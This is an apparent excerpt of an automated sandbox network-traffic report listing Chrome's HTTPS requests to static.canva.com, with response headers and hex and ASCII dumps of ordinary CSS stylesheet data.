                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: U6xN8lpCycDHxuz/l1CknwarjTk7DbXUgagEbaUrot9ZGu26V6fzDScxujL/3ps0W1kcsrfQg+0=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8PN0YC0A3941WE
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: TJD218tFgFi6yYeX.0AaOHtfcymduQad
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC346INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 63 55 43 4a 5a 55 47 4a 70 6a 61 7a 4e 42 7a 61 58 57 4c 77 63 25 32 42 49 57 59 32 4c 72 50 61 4c 30 32 52 67 49 47 50 75 37 62 39 51 33 73 5a 6d 66 4d 4e 43 72 59 42 57 7a 45 32 34 35 53 33 66 33 50 79 41 59 64 50 4b 64 44 39 41 36 66 31 43 54 4b 51 31 71 52 4c 75 4a 35 63 34 38 6c 33 58 71 43 59 64 74 71 71 76 39 5a 56 6f 65 69 56 7a 51 78 7a 67 52 54 45 79 78 72 62 39 7a 38 39 49 48 35 7a 41 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cUCJZUGJpjazNBzaXWLwc%2BIWY2LrPaL02RgIGPu7b9Q3sZmfMNCrYBWzE245S3f3PyAYdPKdD9A6f1CTKQ1qRLuJ5c48l3XqCYdtqqv9ZVoeiVzQxzgRTEyxrb9z89IH5zA%3D"}],"group":"cf-nel","max_age":604800}N
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC1210INData Raw: 2e 5f 70 46 73 66 41 7b 63 6c 69 70 3a 72 65 63 74 28 31 70 78 2c 31 70 78 2c 31 70 78 2c 31 70 78 29 3b 62 6f 72 64 65 72 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 68 65 69 67 68 74 3a 31 70 78 3b 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 3a 2d 31 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 70 78 7d 2e 44 63 79 42 44 41 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 70 6c 61 63 65 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6c 69 67 68 74 7b 2d 2d 57 63 31 7a 4b 51 3a 72 67 62 61 28 36 34 2c 38 37 2c
                                                                                                                                                                                                                                                                    Data Ascii: ._pFsfA{clip:rect(1px,1px,1px,1px);border:0;font-size:0;height:1px;left:0;margin:-1px;overflow:hidden;padding:0;position:absolute;top:0;white-space:nowrap;width:1px}.DcyBDA{display:flex;height:100%;place-items:center;width:100%}.light{--Wc1zKQ:rgba(64,87,
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC1369INData Raw: 72 67 69 6e 3a 34 70 78 20 30 7d 2e 43 41 32 52 62 67 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 69 6e 68 65 72 69 74 3b 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 51 6b 64 36 36 41 7b 2d 2d 76 52 4d 31 53 41 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 2d 2d 47 6f 71 76 45 67 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 2d 2d 6d 6a 42 68 32 41 3a
                                                                                                                                                                                                                                                                    Data Ascii: rgin:4px 0}.CA2Rbg{background:none;border:none;color:inherit;cursor:pointer;font:inherit;height:100%;margin:0;padding:0;text-transform:inherit;-webkit-user-select:none;user-select:none;width:100%}.Qkd66A{--vRM1SA:transparent;--GoqvEg:transparent;--mjBh2A:
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC1369INData Raw: 51 29 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 32 55 64 55 32 77 29 7d 2e 51 6b 64 36 36 41 2e 46 31 50 4e 42 51 2c 2e 51 6b 64 36 36 41 2e 46 31 50 4e 42 51 2e 7a 51 6c 75 73 51 3a 68 6f 76 65 72 2c 2e 51 6b 64 36 36 41 2e 46 31 50 4e 42 51 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 44 33 58 5f 2d 67 29 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 47 6f 71 76 45 67 29 7d 2e 51 6b 64 36 36 41 2e 6b 64 7a 52 4c 77 2e 46 31 50 4e 42 51 2c 2e 51 6b 64 36 36 41 2e 6b 64 7a 52 4c 77 2e 46 31 50 4e 42 51 2e 7a 51 6c 75 73 51 3a 68 6f 76 65 72 2c 2e 51 6b 64 36 36 41 2e 6b 64 7a 52 4c 77 2e 46 31 50 4e 42 51 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 47 78 50 45 38 51 29
                                                                                                                                                                                                                                                                    Data Ascii: Q);color:var(--2UdU2w)}.Qkd66A.F1PNBQ,.Qkd66A.F1PNBQ.zQlusQ:hover,.Qkd66A.F1PNBQ:active{background-color:var(--D3X_-g);color:var(--GoqvEg)}.Qkd66A.kdzRLw.F1PNBQ,.Qkd66A.kdzRLw.F1PNBQ.zQlusQ:hover,.Qkd66A.kdzRLw.F1PNBQ:active{background-color:var(--GxPE8Q)
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC1369INData Raw: 66 51 77 7b 2d 2d 76 52 4d 31 53 41 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 2d 2d 47 6f 71 76 45 67 3a 76 61 72 28 2d 2d 2d 38 55 79 47 77 29 3b 2d 2d 31 53 63 64 35 51 3a 76 61 72 28 2d 2d 4a 45 41 71 50 77 29 7d 2e 51 5f 56 59 5f 67 7b 2d 2d 76 52 4d 31 53 41 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 2d 2d 47 6f 71 76 45 67 3a 76 61 72 28 2d 2d 35 46 38 4d 46 77 29 3b 2d 2d 31 53 63 64 35 51 3a 76 61 72 28 2d 2d 4a 45 41 71 50 77 29 7d 2e 45 51 63 55 50 77 7b 2d 2d 76 52 4d 31 53 41 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 39 29 3b 2d 2d 47 6f 71 76 45 67 3a 23 30 64 31 32 31 36 3b 2d 2d 6d 6a 42 68 32 41 3a 23 66 66 66 3b 2d 2d 44 33 58 5f 2d 67 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 38 29 3b 2d 2d 6c 36 59 31 5a 67 3a 68 73 6c 61 28
                                                                                                                                                                                                                                                                    Data Ascii: fQw{--vRM1SA:transparent;--GoqvEg:var(---8UyGw);--1Scd5Q:var(--JEAqPw)}.Q_VY_g{--vRM1SA:transparent;--GoqvEg:var(--5F8MFw);--1Scd5Q:var(--JEAqPw)}.EQcUPw{--vRM1SA:hsla(0,0%,100%,.9);--GoqvEg:#0d1216;--mjBh2A:#fff;--D3X_-g:hsla(0,0%,100%,.8);--l6Y1Zg:hsla(
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC1369INData Raw: 64 69 6e 67 3a 30 20 63 61 6c 63 28 31 36 70 78 20 2d 20 76 61 72 28 2d 2d 5f 65 55 5f 4d 41 29 29 7d 2e 5f 33 41 48 33 67 77 7b 77 69 64 74 68 3a 34 30 70 78 7d 2e 62 6f 34 56 73 67 7b 2d 2d 5a 79 65 65 36 51 3a 31 30 70 78 3b 68 65 69 67 68 74 3a 36 34 70 78 3b 70 61 64 64 69 6e 67 3a 30 20 63 61 6c 63 28 32 36 70 78 20 2d 20 76 61 72 28 2d 2d 5f 65 55 5f 4d 41 29 29 7d 2e 5f 62 5f 31 51 77 7b 77 69 64 74 68 3a 36 34 70 78 7d 2e 51 6b 64 36 36 41 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 75 62 57 36 71 77 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 66 67 51 77 65 77 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 74 61 72 74 7d 2e 63 77 4f
                                                                                                                                                                                                                                                                    Data Ascii: ding:0 calc(16px - var(--_eU_MA))}._3AH3gw{width:40px}.bo4Vsg{--Zyee6Q:10px;height:64px;padding:0 calc(26px - var(--_eU_MA))}._b_1Qw{width:64px}.Qkd66A::-moz-focus-inner{border:0;padding:0}.ubW6qw{display:flex;width:100%}.fgQwew{justify-content:start}.cwO
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC1369INData Raw: 70 61 63 69 74 79 20 2e 31 35 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 7d 2e 7a 4b 54 45 5f 77 7b 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 33 70 78 7d 2e 73 64 70 5f 76 51 2e 75 78 7a 47 77 77 3a 6e 6f 74 28 2e 5a 69 76 4c 6f 67 29 2c 2e 73 64 70 5f 76 51 2e 75 78 7a 47 77 77 3a 6e 6f 74 28 2e 5a 69 76 4c 6f 67 29 20 2e 5f 33 38 6f 57 76 51 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 51 5f 56 59 5f 67 2c 2e 5f 38 47 41 66 51 77 7b 6d 69 6e 2d 77 69 64 74 68 3a 30 7d 2e 5f 38 47 41 66 51 77 2e 62 6f 34 56 73 67 7b 70 61 64 64 69 6e 67 3a 30 20 63 61 6c 63 28 31 32 70 78 20 2d 20 76 61 72 28 2d 2d 5f 65 55 5f 4d 41 29 29 7d 2e 5f 38 47 41 66 51 77 2e 6c 73 58 70 5f 77 7b 70 61 64 64 69 6e 67 3a 30 20 63 61 6c 63 28 31 30 70 78 20 2d 20 76 61 72 28 2d 2d 5f 65
                                                                                                                                                                                                                                                                    Data Ascii: pacity .15s ease-in-out}.zKTE_w{outline-offset:3px}.sdp_vQ.uxzGww:not(.ZivLog),.sdp_vQ.uxzGww:not(.ZivLog) ._38oWvQ{color:#fff}.Q_VY_g,._8GAfQw{min-width:0}._8GAfQw.bo4Vsg{padding:0 calc(12px - var(--_eU_MA))}._8GAfQw.lsXp_w{padding:0 calc(10px - var(--_e
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC372INData Raw: 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 63 79 5f 67 4e 67 7b 77 69 64 74 68 3a 34 38 70 78 7d 2e 75 6b 4f 61 47 41 7b 77 69 64 74 68 3a 35 36 70 78 7d 2e 52 34 6d 56 45 67 7b 77 69 64 74 68 3a 36 34 70 78 7d 2e 72 50 71 41 46 41 7b 77 69 64 74 68 3a 37 32 70 78 7d 2e 52 50 64 76 6e 41 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 32 70 78 3b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 44 4e 70 41 5a 41 2c 2e 52 50 64 76 6e 41 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 44 4e 70 41 5a 41 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 74 65 78 74 2d 64 65 63
                                                                                                                                                                                                                                                                    Data Ascii: tems:center;display:flex;flex-direction:column}.cy_gNg{width:48px}.ukOaGA{width:56px}.R4mVEg{width:64px}.rPqAFA{width:72px}.RPdvnA{margin-top:12px;overflow-wrap:break-word;width:100%}.DNpAZA,.RPdvnA{text-align:center}.DNpAZA{box-sizing:border-box;text-dec


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    34192.168.2.1249755104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:35 UTC806OUTGET /web/314d0852e94e7e23.ltr.css HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC1202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:36 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                    Content-Length: 3032
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950f41f51de95-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49976
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "a7996780b208157442e889d7272012f6"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:22 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:15 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: q6fK7+ug9KhRch25tLOB3czZ6aPAr3/+IrxPgD73K6+/okGH7w4zgP5BaOGgrIh7Ge8Hl97N4ozXsnnRYaiRwcSS86i5Eflo
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8KT62V11DHSS2P
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: QEUK6FBS3QhNZjbVYcGAXzigv0zdUnNT
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC350INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 77 37 44 59 30 31 35 38 4b 76 66 52 66 75 42 44 4d 6f 68 54 6a 75 57 70 70 36 70 31 79 31 64 67 35 52 70 37 73 53 71 62 6b 25 32 46 47 73 56 56 4d 6a 65 37 7a 37 32 71 76 39 6f 36 61 25 32 46 4e 35 6f 74 79 52 6a 66 4c 6a 5a 56 54 68 31 74 73 62 4f 66 4e 35 57 6b 4c 42 52 6d 57 70 45 69 42 55 30 33 43 50 56 42 31 35 77 77 74 4d 33 56 77 75 4f 56 25 32 42 45 61 45 68 41 79 70 31 56 79 79 62 46 33 7a 62 6a 45 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w7DY0158KvfRfuBDMohTjuWpp6p1y1dg5Rp7sSqbk%2FGsVVMje7z72qv9o6a%2FN5otyRjfLjZVTh1tsbOfN5WkLBRmWpEiBU03CPVB15wwtM3VwuOV%2BEaEhAyp1VyybF3zbjE%3D"}],"group":"cf-nel","max_age":604800
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC1186INData Raw: 68 74 6d 6c 7b 2d 2d 73 61 66 65 2d 61 72 65 61 2d 69 6e 73 65 74 2d 74 6f 70 3a 30 70 78 3b 2d 2d 73 61 66 65 2d 61 72 65 61 2d 69 6e 73 65 74 2d 62 6f 74 74 6f 6d 3a 30 70 78 3b 2d 2d 73 61 66 65 2d 61 72 65 61 2d 69 6e 73 65 74 2d 6c 65 66 74 3a 30 70 78 3b 2d 2d 73 61 66 65 2d 61 72 65 61 2d 69 6e 73 65 74 2d 72 69 67 68 74 3a 30 70 78 7d 40 73 75 70 70 6f 72 74 73 20 28 68 65 69 67 68 74 3a 65 6e 76 28 73 61 66 65 2d 61 72 65 61 2d 69 6e 73 65 74 2d 74 6f 70 29 29 7b 68 74 6d 6c 7b 2d 2d 73 61 66 65 2d 61 72 65 61 2d 69 6e 73 65 74 2d 74 6f 70 3a 65 6e 76 28 73 61 66 65 2d 61 72 65 61 2d 69 6e 73 65 74 2d 74 6f 70 29 3b 2d 2d 73 61 66 65 2d 61 72 65 61 2d 69 6e 73 65 74 2d 62 6f 74 74 6f 6d 3a 65 6e 76 28 73 61 66 65 2d 61 72 65 61 2d 69 6e 73 65 74
                                                                                                                                                                                                                                                                    Data Ascii: html{--safe-area-inset-top:0px;--safe-area-inset-bottom:0px;--safe-area-inset-left:0px;--safe-area-inset-right:0px}@supports (height:env(safe-area-inset-top)){html{--safe-area-inset-top:env(safe-area-inset-top);--safe-area-inset-bottom:env(safe-area-inset
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC1369INData Raw: 74 6f 6d 29 2a 2d 31 29 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 68 65 69 67 68 74 3a 63 61 6c 63 28 76 61 72 28 2d 2d 5a 45 79 4f 30 41 2c 20 31 30 30 25 29 20 2b 20 76 61 72 28 2d 2d 73 61 66 65 2d 61 72 65 61 2d 69 6e 73 65 74 2d 62 6f 74 74 6f 6d 29 29 3b 69 73 6f 6c 61 74 69 6f 6e 3a 69 73 6f 6c 61 74 65 3b 6d 61 78 2d 68 65 69 67 68 74 3a 76 61 72 28 2d 2d 72 41 4f 32 6a 51 2c 31 30 30 25 29 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 61 75 74 6f 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 31 30 30 25 29 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 44 74 41 7a 79 41 20 2e 4c 35 36 44 43 41 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 74 72 61 6e 73 66 6f 72 6d 20 2e 32 73
                                                                                                                                                                                                                                                                    Data Ascii: tom)*-1);display:flex;flex-direction:column;height:calc(var(--ZEyO0A, 100%) + var(--safe-area-inset-bottom));isolation:isolate;max-height:var(--rAO2jQ,100%);pointer-events:auto;transform:translateY(100%);width:100%}.DtAzyA .L56DCA{transition:transform .2s
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC477INData Raw: 5f 35 51 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 65 38 4a 5f 35 51 2e 5f 30 6a 70 65 4e 77 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 76 61 72 28 2d 2d 73 61 66 65 2d 61 72 65 61 2d 69 6e 73 65 74 2d 62 6f 74 74 6f 6d 29 7d 2e 76 41 4c 55 5a 51 7b 74 6f 75 63 68 2d 61 63 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 5f 38 39 71 4d 65 67 20 2e 65 38 4a 5f 35 51 7b 66 6c 65 78 2d 62 61 73 69 73 3a 61 75 74 6f 3b 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 31 7d 2e 5f 51 67 4a 5f 67 7b 70 6f 73 69 74 69 6f 6e 3a 73 74 69 63 6b 79 3b 74 6f 70 3a 30 3b 7a 2d 69 6e 64 65 78 3a 31 7d 2e 46 79 4f 46 32 51 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 4f 75 43 6b
                                                                                                                                                                                                                                                                    Data Ascii: _5Q{display:flex;flex-direction:column}.e8J_5Q._0jpeNw{padding-bottom:var(--safe-area-inset-bottom)}.vALUZQ{touch-action:none}._89qMeg .e8J_5Q{flex-basis:auto;flex-shrink:1}._QgJ_g{position:sticky;top:0;z-index:1}.FyOF2Q{border-bottom:1px solid var(--OuCk


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    35192.168.2.1249754104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:35 UTC806OUTGET /web/de775bd2724d720f.ltr.css HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC1182INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:36 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                    Content-Length: 2570
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950f53db018ee-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49976
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "3f803f8228fde27fe250ad1894fbc288"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:22 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:23 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: BfZKy+iubrFTDIfvCqKk1MZsjQxP2sDCZmMBiu2FPKuvEGJb/gD9BJqJHkg9TkxOWfReY05Grbc=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8WGC25GQGEHAYT
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: UGYFuyeSz8ISkm3Gf22Xn7OrJxD7JU26
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
